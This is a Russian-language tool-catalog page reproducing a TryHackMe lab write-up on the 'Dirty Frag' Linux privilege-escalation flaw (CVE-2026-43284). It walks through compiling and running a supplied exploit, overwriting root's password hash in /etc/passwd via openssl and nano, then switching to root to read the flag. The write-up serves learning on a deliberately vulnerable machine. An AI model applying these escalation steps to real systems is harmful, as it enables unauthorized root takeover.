Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-43284---DirtyFrag-Analysis-THM- — TryHackMe Dirty Frag (CVE-2026-43284) — Linux LPE writeup | Kitploit
Инструменты/GitHubGitHub/revyhub/cve-2026-43284---dirtyfrag-analysis-thm-
Privilege EscalationVulnerability AnalysisExploitationCTFLearning & EducationLabs & Practice
GitHubrevyhub/cve-2026-43284---dirtyfrag-analysis-thm-

CVE-2026-43284---DirtyFrag-Analysis-THM-

TryHackMe Dirty Frag (CVE-2026-43284) — Linux LPE writeup

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
118 дней назадЕщё не проверено

TryHackMe — CVE-2026-43284: Dirty Frag

Комната: CVE-2026-43284: Dirty Frag Категория: Повышение привилегий в Linux Автор: (Моя страница)

Обзор

Dirty Frag — это комната по локальному повышению привилегий (LPE) в Linux, построенная вокруг CVE-2026-43284. Цель — перейти от непривилегированной оболочки к root, используя предоставленный proof-of-concept эксплойт.

Первоначальная энумерация

Вывод содержимого рабочего каталога показывает файлы, предоставленные для эксплойта:

root@kitploit:~
$ ls
README.txt
exp
exp.c
  • exp.c — исходный код эксплойта
  • exp — предварительно скомпилированный бинарный файл (может не соответствовать окружению целевой системы)
  • README.txt — примечания по использованию, прилагаемые к эксплойту

Сборка эксплойта

Поскольку предоставленный бинарник exp может быть несовместим с точным окружением цели, безопаснее пересобрать его из исходников:

root@kitploit:~
$ gcc -O0 -Wall -o exp exp.c -lutil
  • -O0 отключает оптимизации компилятора, сохраняя предсказуемое поведение и соответствие исходному коду
  • -Wall включает предупреждения компилятора, полезные для проверки корректности сборки
  • -lutil линкует libutil — обычно требуется, когда код использует функции псевдотерминала (pty)

Активация уязвимости

root@kitploit:~
$ ./exp

Запуск скомпилированного эксплойта активирует лежащую в основе уязвимость, что даёт доступ на запись к файлу, который обычно доступен непривилегированным пользователям только для чтения — в данном случае /etc/passwd.

Повышение до root

Получив доступ на запись, генерируем новый хэш пароля для root:

root@kitploit:~
$ openssl passwd -1 root
$1$igIXG8so$6K9OaEbAaj.qaknYx9ST..

Этот хэш записывается в /etc/passwd вместо существующего поля хэша root:

root@kitploit:~
$ nano /etc/passwd

Теперь, когда пароль root известен, смена пользователя проста:

root@kitploit:~
$ su root

Захват флага

root@kitploit:~
$ cat /root/flag.txt
THM{REDACTED}

Извлечённые уроки

  • (Изначально на общее понимание ушло 30+ минут, но как только я понял суть, я смог повторно запускать один и тот же эксплойт несколько раз)
  • (Внутренний root-код странный: нельзя выбрать и использовать базовые элементы управления, поэтому вместо этого нужно стрелками перейти к root❌ и заменить X на созданный вами хэш)

Меры предотвращения

  • Держите ядро и системные пакеты пропатченными и обновлёнными

Этот райтап описывает пройденную комнату TryHackMe в образовательных целях. Целевое окружение — намеренно уязвимая машина, предоставленная TryHackMe.

Скачать инструмент